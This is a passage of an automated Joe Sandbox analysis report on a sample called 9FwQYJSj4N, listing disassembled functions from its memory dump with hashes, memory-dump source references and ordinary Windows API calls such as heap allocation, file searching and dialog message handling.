                                                                                    • Opcode Fuzzy Hash: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
                                                                                    • Instruction Fuzzy Hash: 32C0123245C200FECB010BB4DC0AC2BBBB8BBA6312F04C908F0E9C8064C23EC010DB91
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
                                                                                    • Instruction ID: fe4d38d393a194c0a53231235e5716946bc7e6383fb83103c02cfbfdec819026
                                                                                    • Opcode Fuzzy Hash: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
                                                                                    • Instruction Fuzzy Hash: F6C1AF30A006559BFF66EF68C494BA97BE5AF05310F0801FAED859F2C6DB31D944CB61
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: fe3ab203d21a6618439430cf3035d832146f3cca81be60487b7a7dc0fbcb93f7
                                                                                    • Instruction ID: 56fb610919c4082d76d3dc5e0a3f029569259108a51299a64f476c77603556db
                                                                                    • Opcode Fuzzy Hash: fe3ab203d21a6618439430cf3035d832146f3cca81be60487b7a7dc0fbcb93f7
                                                                                    • Instruction Fuzzy Hash: 5D71B471540B859EEB27DB74C8549EBB7E9AF24300F40496EE6EB8B2C1DA326584CF11
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 01008289
                                                                                      • Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1
                                                                                      • Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 2506663941-0
                                                                                    • Opcode ID: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
                                                                                    • Instruction ID: 5f88e9b963bf67398d26c115f1d1c092a74f3649fe068ad1451095828ce5ad8a
                                                                                    • Opcode Fuzzy Hash: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
                                                                                    • Instruction Fuzzy Hash: C841D671D446599AEB22DB60CC54AEEB7B8BF54304F0484EBE1CA570D2EB755BC4CB10
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 010013E1
                                                                                      • Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C
                                                                                      • Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45
                                                                                      • Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
                                                                                    • Instruction ID: cec93fc24bb8fee3a2c314a4ccbc9c33a426a5b10bb4467c275949e2cd0074e7
                                                                                    • Opcode Fuzzy Hash: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
                                                                                    • Instruction Fuzzy Hash: 3C4147B0905B419EE725DF398884AEBFBE5BF28300F50492ED5FE87281CB726654CB10
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 010013E1
                                                                                      • Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C
                                                                                      • Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45
                                                                                      • Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
                                                                                    • Instruction ID: bc2e4b4b238ef7f57742b5714fdac663143d566066f4b237bbba39a9be90b25b
                                                                                    • Opcode Fuzzy Hash: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
                                                                                    • Instruction Fuzzy Hash: C94158B0905B419EE725DF798884AE7FBE5BF28300F50492ED5FE83281CB766654CB10
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0101B098
                                                                                      • Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 64724e6e4eed0f4cecf13058b192c8dfd7ac8179458c9ca0bda29a17c0f87f96
                                                                                    • Instruction ID: 77947289f8eea9fb37141fcc8883db1782b4c376b04e96639b908dc7cd430865
                                                                                    • Opcode Fuzzy Hash: 64724e6e4eed0f4cecf13058b192c8dfd7ac8179458c9ca0bda29a17c0f87f96
                                                                                    • Instruction Fuzzy Hash: 2A317E71C0024AAFDF15DF68D8509EEBBB4AF19300F50449ED889B7281D739AE04CB61
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,01033A34), ref: 0102ACF8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
                                                                                    • Instruction ID: cb2e74e7096d96f92e4c3f95ccaa25d403a0aaedb4e00a7de838c3bdcab58bf7
                                                                                    • Opcode Fuzzy Hash: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
                                                                                    • Instruction Fuzzy Hash: B3110A33700639DF9B32AD2CD84099E77D6AB842607264261FDD6EB648DF35DC0187D0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
                                                                                    • Instruction ID: a5516518c51d1e88399560a690ae40ed458da0b32bbdddd2d6803122b6240b76
                                                                                    • Opcode Fuzzy Hash: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
                                                                                    • Instruction Fuzzy Hash: A301A533900929ABDF13ABA8CD809DEB775BFA8654F014115E996B7191DA34C900C7A0
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 01023C3F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
                                                                                    • Instruction ID: 5c654ee7116b342b02a3a46c1418474835b8131b5591d5f59751335c8fee03aa
                                                                                    • Opcode Fuzzy Hash: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
                                                                                    • Instruction Fuzzy Hash: 4BF0A73220022A9F9F124E6EEC1099A7BD9FF49B207204124FB85DF190DB35E420C790
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 1ca9b14d87cd35ae73b6d311ca7b21e72faa09b4c9e1e08fd8752185ff95eb78
                                                                                    • Instruction ID: 6e3ad07e0d3cb5a1f467e574a9a54423315807e4e8bdd9bd534dc7f4a81142fb
                                                                                    • Opcode Fuzzy Hash: 1ca9b14d87cd35ae73b6d311ca7b21e72faa09b4c9e1e08fd8752185ff95eb78
                                                                                    • Instruction Fuzzy Hash: 34E0653960613556EEB126699C04B9F7ACC9F517B4F15C193EDD897080CB65CC0082E1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 01005AC2
                                                                                      • Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
                                                                                    • Instruction ID: 95c004d0d7deed5b4b6e06d9f91013bd735eaeffec939151e846667c64675ba9
                                                                                    • Opcode Fuzzy Hash: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
                                                                                    • Instruction Fuzzy Hash: 1C018C30810695DAD726E7B8C0407DDFBA4BF78204F60888D94DA53285CBB81B08D7A2
                                                                                    APIs
                                                                                      • Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4
                                                                                      • Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
                                                                                      • Part of subcall function 0100A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE
                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1464966427-0
                                                                                    • Opcode ID: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
                                                                                    • Instruction ID: 756d466e9db7a9a8472cc89dc540bce24e4fd6ca8a202e3e87f9ba7bc4b1c80d
                                                                                    • Opcode Fuzzy Hash: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
                                                                                    • Instruction Fuzzy Hash: 60F05E35009790EAEA6367B88904BCBBBA46F2A332F048A49F1F9531D5C37650948B22
                                                                                    APIs
                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 01010E3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExecutionStateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2211380416-0
                                                                                    • Opcode ID: 101240a25dc0115856865d5a50dfc545165bb877ce10b2337d70e74e2bd91fcb
                                                                                    • Instruction ID: a647dc6ef2056e2f0035351e986774ff2540b64a2fcbc12faf9c71d53334b519
                                                                                    • Opcode Fuzzy Hash: 101240a25dc0115856865d5a50dfc545165bb877ce10b2337d70e74e2bd91fcb
                                                                                    • Instruction Fuzzy Hash: 05D0C230B0106A16EA6633396494BFE298B9FE6210F0C0065B2C55B2CECAAE0482A261
                                                                                    APIs
                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0101A62C
                                                                                      • Part of subcall function 0101A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                    • String ID:
                                                                                    • API String ID: 1915507550-0
                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                    • Instruction ID: b756999aa64b5d282eb878efbe0ab4a01eab456bea9e215b03cb9147fe51894d
                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                    • Instruction Fuzzy Hash: 3DD0A93030120AFAEF426B21CC02AAF7AA9EB58240F008421BCC2C6184EAB9D9109261
                                                                                    APIs
                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,01011B3E), ref: 0101DD92
                                                                                      • Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
                                                                                      • Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
                                                                                      • Part of subcall function 0101B568: IsDialogMessageW.USER32(00010442,?), ref: 0101B59E
                                                                                      • Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
                                                                                      • Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 897784432-0
                                                                                    • Opcode ID: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
                                                                                    • Instruction ID: 0dbb338a7048243b39e188002a5bb92d0cb4d8cdd38cea8fbcb1ecc6a1ebdd9b
                                                                                    • Opcode Fuzzy Hash: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
                                                                                    • Instruction Fuzzy Hash: 80D09E71144300BBD6112B51CE06F4A7AB2BB99B04F404955B3C4740B4CA779D61EB11
                                                                                    APIs
                                                                                    • DloadProtectSection.DELAYIMP ref: 0101E5E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: DloadProtectSection
                                                                                    • String ID:
                                                                                    • API String ID: 2203082970-0
                                                                                    • Opcode ID: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
                                                                                    • Instruction ID: f24ffd3c0d9de15338cb36a0ee711db0cb88598c4778754a3443df5f911b958a
                                                                                    • Opcode Fuzzy Hash: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
                                                                                    • Instruction Fuzzy Hash: F6D012B01402459BE763EBACE445F5C77E9B368B60F800545FEC9D645CEB7D8180D705
                                                                                    APIs
                                                                                    • GetFileType.KERNELBASE(000000FF,010097BE), ref: 010098C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
